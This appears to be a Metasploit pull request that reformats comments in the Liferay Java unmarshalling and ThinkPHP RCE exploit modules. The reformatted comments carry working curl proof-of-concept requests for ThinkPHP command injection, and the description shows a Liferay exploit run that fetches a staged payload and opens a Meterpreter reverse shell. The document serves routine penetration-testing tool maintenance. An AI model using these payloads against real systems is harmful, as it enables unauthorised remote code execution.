### PR TITLE
Fix RuboCop's mistakes in recently landed modules

### DIFF
--- a/modules/exploits/multi/http/liferay_java_unmarshalling.rb
+++ b/modules/exploits/multi/http/liferay_java_unmarshalling.rb
@@ -73,32 +73,28 @@ class MetasploitModule < Msf::Exploit::Remote
       )
     end
 
-    #     Building the Liferay-Portal header:
-    #       https://github.com/liferay/liferay-portal/blob/master/portal-kernel/src/com/liferay/portal/kernel/util/ReleaseInfo.java
-    #     Liferay-Portal header data:
-    #       https://github.com/liferay/liferay-portal/blob/master/release.properties
+    # Building the Liferay-Portal header:
+    #   https://github.com/liferay/liferay-portal/blob/master/portal-kernel/src/com/liferay/portal/kernel/util/ReleaseInfo.java
+    # Liferay-Portal header data:
+    #   https://github.com/liferay/liferay-portal/blob/master/release.properties
     #
-    #     Example GET / response:
-    #       HTTP/1.1 200
-    #       [snip]
-    #       Liferay-Portal: Liferay Community Edition Portal 7.2.0 CE GA1 (Mueller / Build 7200 / June 4, 2019)
-    #       [snip]
+    # Example GET / response:
+    #   HTTP/1.1 200
+    #   [snip]
+    #   Liferay-Portal: Liferay Community Edition Portal 7.2.0 CE GA1 (Mueller / Build 7200 / June 4, 2019)
+    #   [snip]
     version, build = res.headers['Liferay-Portal'].scan(
       /^Liferay.*Portal ([\d.]+.*GA\d+).*Build (\d+)/
     ).flatten
 
-    unless version && (build = begin
-                                 Integer(build)
-                               rescue StandardError
-                                 nil
-                               end)
+    unless version && build
       return CheckCode::Detected(
         'Target did not respond with Liferay version and build.'
       )
     end
 
     # XXX: Liferay versions older than 7.2.1 GA2 (build 7201) "may" be unpatched
-    if build < 7201
+    if build.to_i < 7201
       return CheckCode::Appears(
         "Liferay #{version} MAY be a vulnerable version. Please verify."
       )

--- a/modules/exploits/multi/http/liferay_java_unmarshalling.rb
+++ b/modules/exploits/multi/http/liferay_java_unmarshalling.rb
@@ -75,6 +75,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # Building the Liferay-Portal header:
     #   https://github.com/liferay/liferay-portal/blob/master/portal-kernel/src/com/liferay/portal/kernel/util/ReleaseInfo.java
+    #
     # Liferay-Portal header data:
     #   https://github.com/liferay/liferay-portal/blob/master/release.properties
     #

--- a/modules/exploits/unix/webapp/thinkphp_rce.rb
+++ b/modules/exploits/unix/webapp/thinkphp_rce.rb
@@ -85,26 +85,27 @@ class MetasploitModule < Msf::Exploit::Remote
     import_target_defaults
   end
 
-  # PoC version check using the first <span> from the ThinkPHP copyright
-  #   wvu@kharak:~$ curl -vs "http://127.0.0.1:8080/index.php?s=$((RANDOM))" | xmllint --html --xpath 'substring-after(//div[@class = "copyright"]/span[1]/text(), "V")' -
-  #   *   Trying 127.0.0.1...
-  #   * TCP_NODELAY set
-  #   * Connected to 127.0.0.1 (127.0.0.1) port 8080 (#0)
-  #   > GET /index.php?s=1353 HTTP/1.1
-  #   > Host: 127.0.0.1:8080
-  #   > User-Agent: curl/7.54.0
-  #   > Accept: */*
-  #   >
-  #   < HTTP/1.1 404 Not Found
-  #   < Date: Mon, 13 Apr 2020 06:42:15 GMT
-  #   < Server: Apache/2.4.25 (Debian)
-  #   < X-Powered-By: PHP/7.2.5
-  #   < Content-Length: 7332
-  #   < Content-Type: text/html; charset=utf-8
-  #   <
-  #   { [7332 bytes data]
-  #   * Connection #0 to host 127.0.0.1 left intact
-  #   5.0.20wvu@kharak:~$
+  # PoC version check using the first <span> from the ThinkPHP copyright:
+  #
+  # wvu@kharak:~$ curl -vs "http://127.0.0.1:8080/index.php?s=$((RANDOM))" | xmllint --html --xpath 'substring-after(//div[@class = "copyright"]/span[1]/text(), "V")' -
+  # *   Trying 127.0.0.1...
+  # * TCP_NODELAY set
+  # * Connected to 127.0.0.1 (127.0.0.1) port 8080 (#0)
+  # > GET /index.php?s=1353 HTTP/1.1
+  # > Host: 127.0.0.1:8080
+  # > User-Agent: curl/7.54.0
+  # > Accept: */*
+  # >
+  # < HTTP/1.1 404 Not Found
+  # < Date: Mon, 13 Apr 2020 06:42:15 GMT
+  # < Server: Apache/2.4.25 (Debian)
+  # < X-Powered-By: PHP/7.2.5
+  # < Content-Length: 7332
+  # < Content-Type: text/html; charset=utf-8
+  # <
+  # { [7332 bytes data]
+  # * Connection #0 to host 127.0.0.1 left intact
+  # 5.0.20wvu@kharak:~$
   def check
     # An unknown route will trigger the ThinkPHP copyright with version
     res = send_request_cgi(
@@ -176,28 +177,29 @@ class MetasploitModule < Msf::Exploit::Remote
     end
   end
 
-  # PoC for exploiting ThinkPHP < 5.0.23 to run the id(1) command with output
-  #   wvu@kharak:~$ curl -gvs "http://127.0.0.1:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id" | head -1
-  #   *   Trying 127.0.0.1...
-  #   * TCP_NODELAY set
-  #   * Connected to 127.0.0.1 (127.0.0.1) port 8080 (#0)
-  #   > GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id HTTP/1.1
-  #   > Host: 127.0.0.1:8080
-  #   > User-Agent: curl/7.54.0
-  #   > Accept: */*
-  #   >
-  #   < HTTP/1.1 200 OK
-  #   < Date: Mon, 13 Apr 2020 06:43:45 GMT
-  #   < Server: Apache/2.4.25 (Debian)
-  #   < X-Powered-By: PHP/7.2.5
-  #   < Vary: Accept-Encoding
-  #   < Transfer-Encoding: chunked
-  #   < Content-Type: text/html; charset=UTF-8
-  #   <
-  #   { [60 bytes data]
-  #   * Connection #0 to host 127.0.0.1 left intact
-  #   uid=33(www-data) gid=33(www-data) groups=33(www-data)
-  #   wvu@kharak:~$
+  # PoC for exploiting ThinkPHP < 5.0.23 to run the id(1) command with output:
+  #
+  # wvu@kharak:~$ curl -gvs "http://127.0.0.1:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id" | head -1
+  # *   Trying 127.0.0.1...
+  # * TCP_NODELAY set
+  # * Connected to 127.0.0.1 (127.0.0.1) port 8080 (#0)
+  # > GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id HTTP/1.1
+  # > Host: 127.0.0.1:8080
+  # > User-Agent: curl/7.54.0
+  # > Accept: */*
+  # >
+  # < HTTP/1.1 200 OK
+  # < Date: Mon, 13 Apr 2020 06:43:45 GMT
+  # < Server: Apache/2.4.25 (Debian)
+  # < X-Powered-By: PHP/7.2.5
+  # < Vary: Accept-Encoding
+  # < Transfer-Encoding: chunked
+  # < Content-Type: text/html; charset=UTF-8
+  # <
+  # { [60 bytes data]
+  # * Connection #0 to host 127.0.0.1 left intact
+  # uid=33(www-data) gid=33(www-data) groups=33(www-data)
+  # wvu@kharak:~$
   def exploit_less_than_5_0_23(cmd)
     # XXX: The server may block on executing our payload and won't respond
     res = send_request_cgi({
@@ -222,32 +224,33 @@ class MetasploitModule < Msf::Exploit::Remote
     vprint_line(res.body[0, res.body.length / 2])
   end
 
-  # PoC for exploiting ThinkPHP 5.0.23 to run the id(1) command with output
-  #   wvu@kharak:~$ curl -vsd "_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id" http://127.0.0.1:8081/index.php?s=captcha | head -1
-  #   *   Trying 127.0.0.1...
-  #   * TCP_NODELAY set
-  #   * Connected to 127.0.0.1 (127.0.0.1) port 8081 (#0)
-  #   > POST /index.php?s=captcha HTTP/1.1
-  #   > Host: 127.0.0.1:8081
-  #   > User-Agent: curl/7.54.0
-  #   > Accept: */*
-  #   > Content-Length: 72
-  #   > Content-Type: application/x-www-form-urlencoded
-  #   >
-  #   } [72 bytes data]
-  #   * upload completely sent off: 72 out of 72 bytes
-  #   < HTTP/1.1 200 OK
-  #   < Date: Mon, 13 Apr 2020 06:44:05 GMT
-  #   < Server: Apache/2.4.25 (Debian)
-  #   < X-Powered-By: PHP/7.2.12
-  #   < Vary: Accept-Encoding
-  #   < Transfer-Encoding: chunked
-  #   < Content-Type: text/html; charset=UTF-8
-  #   <
-  #   { [60 bytes data]
-  #   * Connection #0 to host 127.0.0.1 left intact
-  #   uid=33(www-data) gid=33(www-data) groups=33(www-data)
-  #   wvu@kharak:~$
+  # PoC for exploiting ThinkPHP 5.0.23 to run the id(1) command with output:
+  #
+  # wvu@kharak:~$ curl -vsd "_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id" http://127.0.0.1:8081/index.php?s=captcha | head -1
+  # *   Trying 127.0.0.1...
+  # * TCP_NODELAY set
+  # * Connected to 127.0.0.1 (127.0.0.1) port 8081 (#0)
+  # > POST /index.php?s=captcha HTTP/1.1
+  # > Host: 127.0.0.1:8081
+  # > User-Agent: curl/7.54.0
+  # > Accept: */*
+  # > Content-Length: 72
+  # > Content-Type: application/x-www-form-urlencoded
+  # >
+  # } [72 bytes data]
+  # * upload completely sent off: 72 out of 72 bytes
+  # < HTTP/1.1 200 OK
+  # < Date: Mon, 13 Apr 2020 06:44:05 GMT
+  # < Server: Apache/2.4.25 (Debian)
+  # < X-Powered-By: PHP/7.2.12
+  # < Vary: Accept-Encoding
+  # < Transfer-Encoding: chunked
+  # < Content-Type: text/html; charset=UTF-8
+  # <
+  # { [60 bytes data]
+  # * Connection #0 to host 127.0.0.1 left intact
+  # uid=33(www-data) gid=33(www-data) groups=33(www-data)
+  # wvu@kharak:~$
   def exploit_5_0_23(cmd)
     # XXX: The server may block on executing our payload and won't respond
     res = send_request_cgi({

--- a/modules/exploits/unix/webapp/thinkphp_rce.rb
+++ b/modules/exploits/unix/webapp/thinkphp_rce.rb
@@ -87,25 +87,25 @@ class MetasploitModule < Msf::Exploit::Remote
 
   # PoC version check using the first <span> from the ThinkPHP copyright:
   #
-  # wvu@kharak:~$ curl -vs "http://127.0.0.1:8080/index.php?s=$((RANDOM))" | xmllint --html --xpath 'substring-after(//div[@class = "copyright"]/span[1]/text(), "V")' -
-  # *   Trying 127.0.0.1...
-  # * TCP_NODELAY set
-  # * Connected to 127.0.0.1 (127.0.0.1) port 8080 (#0)
-  # > GET /index.php?s=1353 HTTP/1.1
-  # > Host: 127.0.0.1:8080
-  # > User-Agent: curl/7.54.0
-  # > Accept: */*
-  # >
-  # < HTTP/1.1 404 Not Found
-  # < Date: Mon, 13 Apr 2020 06:42:15 GMT
-  # < Server: Apache/2.4.25 (Debian)
-  # < X-Powered-By: PHP/7.2.5
-  # < Content-Length: 7332
-  # < Content-Type: text/html; charset=utf-8
-  # <
-  # { [7332 bytes data]
-  # * Connection #0 to host 127.0.0.1 left intact
-  # 5.0.20wvu@kharak:~$
+  #   wvu@kharak:~$ curl -vs "http://127.0.0.1:8080/index.php?s=$((RANDOM))" | xmllint --html --xpath 'substring-after(//div[@class = "copyright"]/span[1]/text(), "V")' -
+  #   *   Trying 127.0.0.1...
+  #   * TCP_NODELAY set
+  #   * Connected to 127.0.0.1 (127.0.0.1) port 8080 (#0)
+  #   > GET /index.php?s=1353 HTTP/1.1
+  #   > Host: 127.0.0.1:8080
+  #   > User-Agent: curl/7.54.0
+  #   > Accept: */*
+  #   >
+  #   < HTTP/1.1 404 Not Found
+  #   < Date: Mon, 13 Apr 2020 06:42:15 GMT
+  #   < Server: Apache/2.4.25 (Debian)
+  #   < X-Powered-By: PHP/7.2.5
+  #   < Content-Length: 7332
+  #   < Content-Type: text/html; charset=utf-8
+  #   <
+  #   { [7332 bytes data]
+  #   * Connection #0 to host 127.0.0.1 left intact
+  #   5.0.20wvu@kharak:~$
   def check
     # An unknown route will trigger the ThinkPHP copyright with version
     res = send_request_cgi(
@@ -179,27 +179,27 @@ class MetasploitModule < Msf::Exploit::Remote
 
   # PoC for exploiting ThinkPHP < 5.0.23 to run the id(1) command with output:
   #
-  # wvu@kharak:~$ curl -gvs "http://127.0.0.1:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id" | head -1
-  # *   Trying 127.0.0.1...
-  # * TCP_NODELAY set
-  # * Connected to 127.0.0.1 (127.0.0.1) port 8080 (#0)
-  # > GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id HTTP/1.1
-  # > Host: 127.0.0.1:8080
-  # > User-Agent: curl/7.54.0
-  # > Accept: */*
-  # >
-  # < HTTP/1.1 200 OK
-  # < Date: Mon, 13 Apr 2020 06:43:45 GMT
-  # < Server: Apache/2.4.25 (Debian)
-  # < X-Powered-By: PHP/7.2.5
-  # < Vary: Accept-Encoding
-  # < Transfer-Encoding: chunked
-  # < Content-Type: text/html; charset=UTF-8
-  # <
-  # { [60 bytes data]
-  # * Connection #0 to host 127.0.0.1 left intact
-  # uid=33(www-data) gid=33(www-data) groups=33(www-data)
-  # wvu@kharak:~$
+  #   wvu@kharak:~$ curl -gvs "http://127.0.0.1:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id" | head -1
+  #   *   Trying 127.0.0.1...
+  #   * TCP_NODELAY set
+  #   * Connected to 127.0.0.1 (127.0.0.1) port 8080 (#0)
+  #   > GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id HTTP/1.1
+  #   > Host: 127.0.0.1:8080
+  #   > User-Agent: curl/7.54.0
+  #   > Accept: */*
+  #   >
+  #   < HTTP/1.1 200 OK
+  #   < Date: Mon, 13 Apr 2020 06:43:45 GMT
+  #   < Server: Apache/2.4.25 (Debian)
+  #   < X-Powered-By: PHP/7.2.5
+  #   < Vary: Accept-Encoding
+  #   < Transfer-Encoding: chunked
+  #   < Content-Type: text/html; charset=UTF-8
+  #   <
+  #   { [60 bytes data]
+  #   * Connection #0 to host 127.0.0.1 left intact
+  #   uid=33(www-data) gid=33(www-data) groups=33(www-data)
+  #   wvu@kharak:~$
   def exploit_less_than_5_0_23(cmd)
     # XXX: The server may block on executing our payload and won't respond
     res = send_request_cgi({
@@ -226,31 +226,31 @@ class MetasploitModule < Msf::Exploit::Remote
 
   # PoC for exploiting ThinkPHP 5.0.23 to run the id(1) command with output:
   #
-  # wvu@kharak:~$ curl -vsd "_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id" http://127.0.0.1:8081/index.php?s=captcha | head -1
-  # *   Trying 127.0.0.1...
-  # * TCP_NODELAY set
-  # * Connected to 127.0.0.1 (127.0.0.1) port 8081 (#0)
-  # > POST /index.php?s=captcha HTTP/1.1
-  # > Host: 127.0.0.1:8081
-  # > User-Agent: curl/7.54.0
-  # > Accept: */*
-  # > Content-Length: 72
-  # > Content-Type: application/x-www-form-urlencoded
-  # >
-  # } [72 bytes data]
-  # * upload completely sent off: 72 out of 72 bytes
-  # < HTTP/1.1 200 OK
-  # < Date: Mon, 13 Apr 2020 06:44:05 GMT
-  # < Server: Apache/2.4.25 (Debian)
-  # < X-Powered-By: PHP/7.2.12
-  # < Vary: Accept-Encoding
-  # < Transfer-Encoding: chunked
-  # < Content-Type: text/html; charset=UTF-8
-  # <
-  # { [60 bytes data]
-  # * Connection #0 to host 127.0.0.1 left intact
-  # uid=33(www-data) gid=33(www-data) groups=33(www-data)
-  # wvu@kharak:~$
+  #   wvu@kharak:~$ curl -vsd "_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id" http://127.0.0.1:8081/index.php?s=captcha | head -1
+  #   *   Trying 127.0.0.1...
+  #   * TCP_NODELAY set
+  #   * Connected to 127.0.0.1 (127.0.0.1) port 8081 (#0)
+  #   > POST /index.php?s=captcha HTTP/1.1
+  #   > Host: 127.0.0.1:8081
+  #   > User-Agent: curl/7.54.0
+  #   > Accept: */*
+  #   > Content-Length: 72
+  #   > Content-Type: application/x-www-form-urlencoded
+  #   >
+  #   } [72 bytes data]
+  #   * upload completely sent off: 72 out of 72 bytes
+  #   < HTTP/1.1 200 OK
+  #   < Date: Mon, 13 Apr 2020 06:44:05 GMT
+  #   < Server: Apache/2.4.25 (Debian)
+  #   < X-Powered-By: PHP/7.2.12
+  #   < Vary: Accept-Encoding
+  #   < Transfer-Encoding: chunked
+  #   < Content-Type: text/html; charset=UTF-8
+  #   <
+  #   { [60 bytes data]
+  #   * Connection #0 to host 127.0.0.1 left intact
+  #   uid=33(www-data) gid=33(www-data) groups=33(www-data)
+  #   wvu@kharak:~$
   def exploit_5_0_23(cmd)
     # XXX: The server may block on executing our payload and won't respond
     res = send_request_cgi({


### PR DESCRIPTION
Note that I went through all the changed files, not just my own. These were the files I updated:

```
modules/exploits/multi/http/liferay_java_unmarshalling.rb
modules/exploits/unix/webapp/thinkphp_rce.rb
```

Liferay confirmed still working:

```
msf5 exploit(multi/http/liferay_java_unmarshalling) > check
[*] 127.0.0.1:8080 - The target appears to be vulnerable. Liferay 7.2.0 CE GA1 MAY be a vulnerable version. Please verify.
msf5 exploit(multi/http/liferay_java_unmarshalling) > run

[*] Started reverse TCP handler on 192.168.1.3:4444
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable. Liferay 7.2.0 CE GA1 MAY be a vulnerable version. Please verify.
[*] Using URL: http://0.0.0.0:8888/
[*] Local IP: http://192.168.1.3:8888/
[+] Started remote classloader server at http://192.168.1.3:8888/
[*] Sending remote classloader gadget to http://127.0.0.1:8080/api/jsonws/expandocolumn/update-column
[*] GET /Mjzkclynonowuwwaacvzewsoozxipomnfce.class requested
[+] Sending constructor class
[*] GET /metasploit/Payload.class requested
[+] Sending payload class
[*] HEAD /metasploit.dat requested
[+] Sending 200
[*] GET /metasploit.dat requested
[+] Sending payload config
[*] HEAD /metasploit/Payload.class requested
[+] Sending 200
[*] GET /metasploit/Payload.class requested
[+] Sending payload class
[*] Sending stage (53928 bytes) to 192.168.1.3
[*] Meterpreter session 1 opened (192.168.1.3:4444 -> 192.168.1.3:63659) at 2020-04-17 10:29:32 -0500
[*] Server stopped.

meterpreter >
```

ETA: We've decided to stick with no block comments for now.

Fixes #13261.